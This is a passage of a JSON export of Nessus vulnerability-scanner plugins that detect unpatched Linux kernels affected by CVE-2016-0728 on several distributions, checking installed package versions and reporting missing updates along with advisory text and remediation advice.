'exists_check':'kernel-uek-debug-4.1.12'},\n {'reference':'kernel-uek-debug-devel-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-4.1.12'},\n {'reference':'kernel-uek-devel-4.1.12-32.1.2.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-4.1.12'},\n {'reference':'kernel-uek-doc-4.1.12-32.1.2.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-4.1.12'},\n {'reference':'kernel-uek-firmware-4.1.12-32.1.2.el7uek', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-4.1.12'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if 
(rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-4.1.12-32.1.2.el6uek / dtrace-modules-4.1.12-32.1.2.el7uek / kernel-uek / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:46", "description": "Perception Point Research identified a use-after-free vulnerability, representing a local privilege escalation vulnerability in the Linux kernel. Their post contains a detailed analysis of the bug.\n\nkernel-4.1.13-19.30.amzn1 and earlier versions are impacted.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : kernel (ALAS-2016-642)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:kernel-headers", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:perf-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-642.NASL", "href": "https://www.tenable.com/plugins/nessus/87991", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-642.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n 
script_id(87991);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"ALAS\", value:\"2016-642\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2016-642)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Perception Point Research identified a use-after-free vulnerability,\nrepresenting a local privilege escalation vulnerability in the Linux\nkernel. Their post contains a detailed analysis of the bug.\n\nkernel-4.1.13-19.30.amzn1 and earlier versions are impacted.\"\n );\n # http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20d57016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-642.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum clean all' followed by 'yum update kernel' to update your\nsystem. 
You will need to reboot your system in order for the new\nkernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"kernel-tools-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.1.13-19.31.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.1.13-19.31.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:29", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2872-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88015);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. 
A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic-lpae\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-lowlatency\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:32", "description": "Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for reporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "CentOS 7 : kernel (CESA-2016:0064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-debug-devel", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88148", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064 and \n# CentOS Errata and Security Advisory 2016:0064 
respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88148);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2016:0064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
The system\nmust be rebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-January/021625.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5252ffe4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / 
kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:33", "description": "* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20160125_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/88174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network 
